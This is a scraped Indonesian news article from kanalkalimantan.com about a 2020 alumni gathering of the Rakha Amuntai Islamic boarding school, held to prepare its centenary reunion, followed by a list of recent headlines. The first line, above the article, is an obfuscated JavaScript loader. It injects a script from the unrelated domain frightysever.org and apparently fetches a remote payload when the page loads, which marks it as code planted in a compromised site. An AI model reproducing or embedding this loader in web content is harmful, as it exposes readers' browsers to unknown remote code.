(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Songsong Seabad Ponpes Rakha, Temu Alumni Digelar


KANALKALIMANTAN.COM, AMUNTAIKeluarga Besar Alumni Ponpes Rakha menggelar silaturahmi dalam rangka menyongsong 1 abad berdirinya Pondok Pesantren Rasyidiyah Khalidiyah (Rakha) Amuntai pada tahun 2022.

Acara digelar di aula STAI Rakha Amuntai Sabtu (11/1/2020), berlangsung hangat dan penuh kekeluargaan.

Selain diikuti  ratusan alumni dari berbagai daerah, tidak ketinggalan hadir Bupati Hulu Sungai Utara H Abdul Wahid HK yang juga merupakan alumni Ponpes Rakha Amuntai.

H Ahmad Zaini, panitia pelaksana mengaku bersyukur masih bisa bertemu muka dengan para alumni maupun sahabat sewaktu menimba ilmu di Ponpes Rakha.

Zaini menyebut, silaturahmi keluarga besar Ponpes Rakha Amuntai ini, sengaja dilaksanakan untuk menjadi perhatian seluruh alumni, supaya menyempatkan diri hadir dalam rangka persiapan reuni akbar 100 tahun Ponpes Rakha Amuntai pada tahun 2022 mendatang.

“Alhamdulillah, mudahan pada reuni Akbar nanti lebih banyak yang berhadir, semoga selalu diberikan kesehatan dan hidayah untuk terus menjalin silaturahmi,” ujar Zaini.

Sementara itu Bupati HSU H Abdul Wahid HK menyambut baik kegiatan silaturahmi ini selain bisa berjumpa dengan para alumni Ponpes Rakha Amuntai juga masih bisa bertemu dengan guru-guru sewaktu mondok diantaranya Mu’allim H Suhaimi dan KH Dr Saberan Affandi,” ungkapnya.

Ia mengharapkan acara ini  menjadi awal yang baik untuk menyongsong reuni akbar 1 abad Ponpes Rakha Amuntai sebagai salah satu Ponpes tertua di Kalimantan.

Hal ini,tentunya selain harapan besar juga dibutuhkan keseriusan dan persiapan yang matang agar reuni Akbar bisa berjalan dengan lancar. Mulai dari kepanitiaan, tempat, inventarisasi kegiatan serta perlengkapan lainnya. Oleh karena itu diharapkan melalui silaturahmi ini bisa saling bertukar ide ataupun masukan-masukan untuk suksesnya reuni Akbar Ponpes Rakha Amuntai yang akan digelar tahun 2022 mendatang.

“Kami siap mendukung terselenggaranya reuni Akbar Ponpes Rakha Amuntai, tentunya dengan kerjasama kawan-kawan alumni. Supaya reuni ini tidak hanya berlalu datang kemudian pulang. Melainkan membawa berkah dan manfaat untuk pengembangan Ponpes Rakha Amuntai yang kita cintai ini,” ungkap lulusan Ponpes Rakha tahun 70-an ini.

Selain itu, dirinya juga memuji banyak alumni Rakha yang telah sukses dan berhasil membuktikan bahwa lulusan Rakha tidak bisa dipandang sebelah mata. (kanalkalimantan.com/dew)

Reporter : Kanalkalimantan.com/Dew
Editor : Bie


Desy Arfianty

Recent Posts

Lomba Mancing Ikan di Sungai Kemuning Meriahkan HUT ke-17 Kecamatan Banjarbaru Selatan

KANALKALIMANTAN.COM, BANJARBARU - Warga Kecamatan Banjarbaru Selatan antusias memeriahkan lomba memancing ikan yang digelar di… Read More

44 menit ago

Peduli Korban Kebakaran di Cempaka, Srikandi PLN Salurkan Bantuan Perlengkapan Dapur

KANALKALIMANTAN.COM, BANJARBARU – Srikandi PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B)… Read More

2 jam ago

Bupati dan Wabup Banjar Hadiri Haul Ke-86 Datu Kasyful Anwar

KANALKALIMANTAN.COM, MARTAPURA - Ribuan orang memadati area kubah tempat dilaksanakannya haul ke-86 Tuan Guru KH… Read More

6 jam ago

Lelaki di Banjarmasin Habisi Kakak Ipar, Jasad Dibuang ke Wilayah Kintap

KANALKALIMANTAN.COM, BANJARMASIN - Kepolisian dari Satuan Reserse Kriminal (Satreskrim) Polresta Banjarmasin mengungkap kasus pembunuhan yang… Read More

6 jam ago

Tingkatkan Capaian Akses Layanan Air Limbah dan Air Minum, Dinas PUPR Kalsel Gelar Workshop

KANALKALIMANTAN.COM, BANJARBARU - Workshop Implementasi Jastrada Air Minum Provinsi Kalsel tahun 2024 di Banjarmasin digelar… Read More

24 jam ago

Ikuti Festival Tunas Bahasa Ibu Nasional di jakarta, Murid SDN Indrasari 2 Audiensi ke Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Murid kelas 5 SDN Indrasari 2 Martapura, M Royan bersama guru dan… Read More

24 jam ago

This website uses cookies.